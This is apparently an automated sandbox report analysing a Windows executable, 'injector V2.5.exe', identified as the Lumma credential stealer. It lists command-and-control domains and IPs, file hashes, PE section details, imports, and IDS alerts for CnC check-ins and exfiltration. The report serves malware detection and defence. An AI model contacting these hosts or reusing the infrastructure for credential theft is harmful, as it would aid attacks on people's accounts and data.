          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials11
          File and Directory Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          injector V2.5.exe39%ReversingLabsWin32.Trojan.Generic
          injector V2.5.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://frogs-severz.sbs/VQ0%Avira URL Cloudsafe
          https://frogs-severz.sbs/0%Avira URL Cloudsafe
          https://frogs-severz.sbs/api0%Avira URL Cloudsafe
          https://frogs-severz.sbs/apit10%Avira URL Cloudsafe
          https://frogs-severz.sbs:443/apiBB2B7164E0%Avira URL Cloudsafe
          https://frogs-severz.sbs/s0%Avira URL Cloudsafe
          https://frogs-severz.sbs/7P0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          frogs-severz.sbs
          104.21.88.250
          truetrue
            unknown
            revirepart.biz
            104.21.43.198
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://frogs-severz.sbs/apitrue
              • Avira URL Cloud: safe
              unknown
              https://revirepart.biz/apifalse
                high
                revirepart.bizfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabinjector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://duckduckgo.com/ac/?q=injector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoinjector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://frogs-severz.sbs:443/apiBB2B7164Einjector V2.5.exe, 00000002.00000003.1935433049.0000000002D79000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://frogs-severz.sbs/7Pinjector V2.5.exe, 00000002.00000003.1863121105.00000000053DD000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1862335417.00000000053DD000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=injector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://crl.rootca1.amazontrust.com/rootca1.crl0injector V2.5.exe, 00000002.00000003.1839307754.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://frogs-severz.sbs/VQinjector V2.5.exe, 00000002.00000003.1863121105.00000000053DD000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1834651944.00000000053DB000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1839575031.00000000053DD000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1939838274.00000000053DE000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1834937904.00000000053DD000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1862335417.00000000053DD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=injector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://ocsp.rootca1.amazontrust.com0:injector V2.5.exe, 00000002.00000003.1839307754.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016injector V2.5.exe, 00000002.00000003.1788447753.0000000005428000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1788363210.000000000542F000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1810691488.0000000005428000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1788551864.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17injector V2.5.exe, 00000002.00000003.1788447753.0000000005428000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1788363210.000000000542F000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1810691488.0000000005428000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1788551864.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.ecosia.org/newtab/injector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://frogs-severz.sbs/apit1injector V2.5.exe, 00000002.00000003.1914569157.0000000002DEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brinjector V2.5.exe, 00000002.00000003.1841001230.00000000054F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://ac.ecosia.org/autocomplete?q=injector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://frogs-severz.sbs/injector V2.5.exe, 00000002.00000003.1939838274.00000000053DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://x1.c.lencr.org/0injector V2.5.exe, 00000002.00000003.1839307754.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://x1.i.lencr.org/0injector V2.5.exe, 00000002.00000003.1839307754.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installinjector V2.5.exe, 00000002.00000003.1788447753.0000000005403000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchinjector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://support.microsofinjector V2.5.exe, 00000002.00000003.1788363210.0000000005431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?injector V2.5.exe, 00000002.00000003.1839307754.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://frogs-severz.sbs/sinjector V2.5.exe, 00000002.00000003.1935433049.0000000002D79000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1940531601.0000000002D79000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1939442013.0000000002D79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesinjector V2.5.exe, 00000002.00000003.1788447753.0000000005403000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://support.mozilla.org/products/firefoxgro.allinjector V2.5.exe, 00000002.00000003.1841001230.00000000054F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=injector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            104.21.43.198
                                                            revirepart.bizUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            104.21.88.250
                                                            frogs-severz.sbsUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1561472
                                                            Start date and time:2024-11-23 14:16:33 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 4m 36s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:6
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:injector V2.5.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@4/0@2/2
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 84%
                                                            • Number of executed functions: 37
                                                            • Number of non-executed functions: 103
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Stop behavior analysis, all processes terminated
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: injector V2.5.exe
                                                            TimeTypeDescription
                                                            08:17:30API Interceptor9x Sleep call for process: injector V2.5.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            104.21.43.198b.exeGet hashmaliciousLummaC StealerBrowse
                                                              injector V2.5.exeGet hashmaliciousLummaCBrowse
                                                                gdi32.dllGet hashmaliciousLummaCBrowse
                                                                  Loader.exeGet hashmaliciousLummaCBrowse
                                                                    104.21.88.250SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                      b.exeGet hashmaliciousLummaC StealerBrowse
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        revirepart.bizSystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.184.174
                                                                        b.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.43.198
                                                                        injector V2.5.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.43.198
                                                                        hmjsOnyfSB.dllGet hashmaliciousLummaCBrowse
                                                                        • 172.67.184.174
                                                                        modest-menu.exeGet hashmaliciousLummaCBrowse
                                                                        • 172.67.184.174
                                                                        gdi32.dllGet hashmaliciousLummaCBrowse
                                                                        • 104.21.43.198
                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.43.198
                                                                        c2_Acid.exeGet hashmaliciousLummaCBrowse
                                                                        • 172.67.184.174
                                                                        XRuncher_2.5.0.6.exeGet hashmaliciousLummaCBrowse
                                                                        • 172.67.184.174
                                                                        Jorieh.exeGet hashmaliciousLummaCBrowse
                                                                        • 172.67.184.174
                                                                        frogs-severz.sbsSystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.88.250
                                                                        b.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.88.250
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 193.143.1.19
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSinjector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.44.93
                                                                        injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.33.116
                                                                        loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.162.84
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.33.116
                                                                        file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                        • 104.21.33.116
                                                                        psol.txt.ps1Get hashmaliciousLummaCBrowse
                                                                        • 172.66.0.235
                                                                        SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.88.250
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.33.116
                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.67.179
                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.20.178
                                                                        CLOUDFLARENETUSinjector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.44.93
                                                                        injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.33.116
                                                                        loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.162.84
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.33.116
                                                                        file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                        • 104.21.33.116
                                                                        psol.txt.ps1Get hashmaliciousLummaCBrowse
                                                                        • 172.66.0.235
                                                                        SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.88.250
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.33.116
                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.67.179
                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.20.178
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        a0e9f5d64349fb13191bc781f81f42e1injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.43.198
                                                                        • 104.21.88.250
                                                                        injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.43.198
                                                                        • 104.21.88.250
                                                                        loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.43.198
                                                                        • 104.21.88.250
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.43.198
                                                                        • 104.21.88.250
                                                                        file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                        • 104.21.43.198
                                                                        • 104.21.88.250
                                                                        psol.txt.ps1Get hashmaliciousLummaCBrowse
                                                                        • 104.21.43.198
                                                                        • 104.21.88.250
                                                                        SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.43.198
                                                                        • 104.21.88.250
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.43.198
                                                                        • 104.21.88.250
                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.43.198
                                                                        • 104.21.88.250
                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.43.198
                                                                        • 104.21.88.250
                                                                        No context
                                                                        No created / dropped files found
                                                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.732133080216734
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:injector V2.5.exe
                                                                        File size:501'248 bytes
                                                                        MD5:bcc3a5ac8ca364b58e08a8e771992d6a
                                                                        SHA1:36f9ad6f96a2112c5ce71dba2cd87b04f33e6e6a
                                                                        SHA256:fd0068122528a6a7042dd6301a77067e9675acbddce740e5e85e840d54f98243
                                                                        SHA512:7c3280d2c30a886261e6c2537a3bed60458cc7329a8658f08901d9b4850a31042f6c66bdddaab87c3a45042731c14c912e0f25fc2b49188665e2a42fbe13749e
                                                                        SSDEEP:12288:1JB+nneDgkXFEIAY4vKsI+koNRtw++ttp42IK7nV:bAoR2jYQKLPAtQD+fCV
                                                                        TLSH:3FB4F1AA77A3D0B3E1A2183141E49EB5466F7E700F20A4FB97601F791B366C28532E57
                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...t.@g............................pX............@.......................................@.................................T...<..
                                                                        Icon Hash:90cececece8e8eb0
                                                                        Entrypoint:0x415870
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows cui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x6740AA74 [Fri Nov 22 15:59:48 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:6
                                                                        OS Version Minor:0
                                                                        File Version Major:6
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:6
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:887797384d81c493a9d8ee55dad3b2e1
                                                                        Instruction
                                                                        call 00007F41E48769BAh
                                                                        jmp 00007F41E487681Dh
                                                                        mov ecx, dword ptr [0042B5F0h]
                                                                        push esi
                                                                        push edi
                                                                        mov edi, BB40E64Eh
                                                                        mov esi, FFFF0000h
                                                                        cmp ecx, edi
                                                                        je 00007F41E48769B6h
                                                                        test esi, ecx
                                                                        jne 00007F41E48769D8h
                                                                        call 00007F41E48769E1h
                                                                        mov ecx, eax
                                                                        cmp ecx, edi
                                                                        jne 00007F41E48769B9h
                                                                        mov ecx, BB40E64Fh
                                                                        jmp 00007F41E48769C0h
                                                                        test esi, ecx
                                                                        jne 00007F41E48769BCh
                                                                        or eax, 00004711h
                                                                        shl eax, 10h
                                                                        or ecx, eax
                                                                        mov dword ptr [0042B5F0h], ecx
                                                                        not ecx
                                                                        pop edi
                                                                        mov dword ptr [0042B5ECh], ecx
                                                                        pop esi
                                                                        ret
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        sub esp, 14h
                                                                        and dword ptr [ebp-0Ch], 00000000h
                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                        and dword ptr [ebp-08h], 00000000h
                                                                        push eax
                                                                        call dword ptr [0042946Ch]
                                                                        mov eax, dword ptr [ebp-08h]
                                                                        xor eax, dword ptr [ebp-0Ch]
                                                                        mov dword ptr [ebp-04h], eax
                                                                        call dword ptr [00429430h]
                                                                        xor dword ptr [ebp-04h], eax
                                                                        call dword ptr [0042942Ch]
                                                                        xor dword ptr [ebp-04h], eax
                                                                        lea eax, dword ptr [ebp-14h]
                                                                        push eax
                                                                        call dword ptr [004294A8h]
                                                                        mov eax, dword ptr [ebp-10h]
                                                                        lea ecx, dword ptr [ebp-04h]
                                                                        xor eax, dword ptr [ebp-14h]
                                                                        xor eax, dword ptr [ebp-04h]
                                                                        xor eax, ecx
                                                                        leave
                                                                        ret
                                                                        mov eax, 00004000h
                                                                        ret
                                                                        push 0042C970h
                                                                        call dword ptr [00429488h]
                                                                        ret
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        mov al, 01h
                                                                        ret
                                                                        push 00030000h
                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x292540x3c.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2f0000x1400.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x237c00xc0.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x293c80x138.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x2169a0x2180002aff72e65eaf052f891170e28598361False0.550606343283582data6.737058354414408IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x230000x72640x740091e5fdecc510d2c4e72b1b50db3c2501False0.40641837284482757data4.769873714467996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x2b0000x20680x1000f9b2b4b1f63578440eedd0ace5ac94f1False0.484375OpenPGP Secret Key5.090094544660231IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .00cfg0x2e0000x80x200160c8b290b62e5e566d05ce3bec76423False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x2f0000x14000x140029fb367912ce622b91120c5cffd84495False0.81953125data6.557860970753822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                        .coS0x310000x4ee000x4ee006cbc315130b915278f3d798b2df9b067False1.000328100237718data7.999439261577721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        DLLImport
                                                                        KERNEL32.dllCloseHandle, CompareStringW, CreateFileA, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObjectEx, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                        GDI32.dllCreateEllipticRgn
                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-11-23T14:17:29.663824+01002057646ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (revirepart .biz)1192.168.2.4617061.1.1.153UDP
                                                                        2024-11-23T14:17:31.428348+01002057647ET MALWARE Observed Win32/Lumma Stealer Related Domain (revirepart .biz in TLS SNI)1192.168.2.449730104.21.43.198443TCP
                                                                        2024-11-23T14:17:31.428348+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.43.198443TCP
                                                                        2024-11-23T14:17:32.104063+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.43.198443TCP
                                                                        2024-11-23T14:17:32.104063+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.43.198443TCP
                                                                        2024-11-23T14:17:33.785867+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.88.250443TCP
                                                                        2024-11-23T14:17:34.517725+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731104.21.88.250443TCP
                                                                        2024-11-23T14:17:34.517725+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.88.250443TCP
                                                                        2024-11-23T14:17:35.837311+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.88.250443TCP
                                                                        2024-11-23T14:17:36.543606+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449732104.21.88.250443TCP
                                                                        2024-11-23T14:17:36.543606+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732104.21.88.250443TCP
                                                                        2024-11-23T14:17:38.055093+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.88.250443TCP
                                                                        2024-11-23T14:17:40.586974+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.88.250443TCP
                                                                        2024-11-23T14:17:43.448049+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.88.250443TCP
                                                                        2024-11-23T14:17:45.914671+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.88.250443TCP
                                                                        2024-11-23T14:17:48.020961+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.88.250443TCP
                                                                        2024-11-23T14:17:49.421766+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449738104.21.88.250443TCP
                                                                        2024-11-23T14:17:50.790073+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.88.250443TCP
                                                                        2024-11-23T14:17:51.493354+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449742104.21.88.250443TCP
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 23, 2024 14:17:30.054642916 CET49730443192.168.2.4104.21.43.198
                                                                        Nov 23, 2024 14:17:30.054686069 CET44349730104.21.43.198192.168.2.4
                                                                        Nov 23, 2024 14:17:30.054790974 CET49730443192.168.2.4104.21.43.198
                                                                        Nov 23, 2024 14:17:30.099710941 CET49730443192.168.2.4104.21.43.198
                                                                        Nov 23, 2024 14:17:30.099730968 CET44349730104.21.43.198192.168.2.4
                                                                        Nov 23, 2024 14:17:31.428204060 CET44349730104.21.43.198192.168.2.4
                                                                        Nov 23, 2024 14:17:31.428348064 CET49730443192.168.2.4104.21.43.198
                                                                        Nov 23, 2024 14:17:31.441452026 CET49730443192.168.2.4104.21.43.198
                                                                        Nov 23, 2024 14:17:31.441468000 CET44349730104.21.43.198192.168.2.4
                                                                        Nov 23, 2024 14:17:31.441894054 CET44349730104.21.43.198192.168.2.4
                                                                        Nov 23, 2024 14:17:31.493243933 CET49730443192.168.2.4104.21.43.198
